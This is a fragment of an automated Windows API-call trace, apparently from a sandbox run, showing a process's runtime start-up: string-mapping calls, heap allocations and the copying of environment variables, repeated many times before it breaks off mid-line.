\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0100.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0100.495] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e8a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0100.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18ef68, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÈ®\x12ä¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0100.503] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0100.503] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4088ff [0100.674] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa10da0) returned 0x80 [0100.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0100.697] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x1f) returned 0xa0ee70 [0100.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0xa0ee70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0100.713] GetLastError () returned 0x0 [0100.713] SetLastError (dwErrCode=0x0) [0100.713] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x0, Size=0x4) returned 0xa11050 [0100.713] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11050) returned 0x4 [0100.714] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11050, Size=0x8) returned 0xa11050 [0100.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0100.714] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x36) returned 0xa11060 [0100.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0xa11060, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0100.714] GetLastError () returned 0x0 [0100.714] SetLastError (dwErrCode=0x0) [0100.714] GetLastError () returned 0x0 [0100.714] SetLastError (dwErrCode=0x0) [0100.714] GetLastError () returned 0x0 [0100.714] SetLastError (dwErrCode=0x0) [0100.722] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11050) returned 0x8 [0100.722] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11050, Size=0xc) returned 0xa110a0 [0100.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0100.722] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x37) returned 0xa110b8 [0100.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0xa110b8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0100.722] GetLastError () returned 0x0 [0100.722] SetLastError (dwErrCode=0x0) [0100.722] GetLastError () returned 0x0 [0100.722] SetLastError (dwErrCode=0x0) [0100.722] GetLastError () returned 0x0 [0100.722] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa110a0) returned 0xc [0100.723] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa110a0, Size=0x10) returned 0xa110a0 [0100.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0100.723] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x3c) returned 0xa04f68 [0100.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0xa04f68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] GetLastError () returned 0x0 [0100.723] SetLastError (dwErrCode=0x0) [0100.723] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa110a0) returned 0x10 [0100.724] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa110a0, Size=0x14) returned 0xa110f8 [0100.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0100.724] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x31) returned 0xa11118 [0100.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0xa11118, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] GetLastError () returned 0x0 [0100.724] SetLastError (dwErrCode=0x0) [0100.724] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa110f8) returned 0x14 [0100.724] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa110f8, Size=0x18) returned 0xa110f8 [0100.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0100.725] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x17) returned 0xa11158 [0100.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xa11158, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.725] SetLastError (dwErrCode=0x0) [0100.725] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa110f8) returned 0x18 [0100.726] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa110f8, Size=0x1c) returned 0xa11178 [0100.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0100.726] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x24) returned 0xa0a930 [0100.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0xa0a930, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.726] GetLastError () returned 0x0 [0100.726] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x1c [0100.727] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x20) returned 0xa11178 [0100.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.727] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x14) returned 0xa110f8 [0100.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0xa110f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.727] SetLastError (dwErrCode=0x0) [0100.727] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] GetLastError () returned 0x0 [0100.728] SetLastError (dwErrCode=0x0) [0100.728] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x20 [0100.728] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x24) returned 0xa11178 [0100.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.729] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0xd) returned 0xa0e5c8 [0100.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0xa0e5c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.729] SetLastError (dwErrCode=0x0) [0100.729] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x24 [0100.730] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x28) returned 0xa11178 [0100.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0100.730] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x25) returned 0xa0a960 [0100.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xa0a960, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.730] SetLastError (dwErrCode=0x0) [0100.730] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.731] GetLastError () returned 0x0 [0100.731] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] RtlSizeHeap (HeapHandle=0x9f0000, Flags=0x0, MemoryPointer=0xa11178) returned 0x28 [0100.732] RtlReAllocateHeap (Heap=0x9f0000, Flags=0x0, Ptr=0xa11178, Size=0x2c) returned 0xa11178 [0100.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0100.732] RtlAllocateHeap (HeapHandle=0x9f0000, Flags=0x8, Size=0x39) returned 0xa04fb0 [0100.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0xa04fb0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0100.732] GetLastError () returned 0x0 [0100.732] SetLastError (dwErrCode=0x0) [0100.732] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.734] SetLastError (dwErrCode=0x0) [0100.734] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 0x0 [0100.735] SetLastError (dwErrCode=0x0) [0100.735] GetLastError () returned 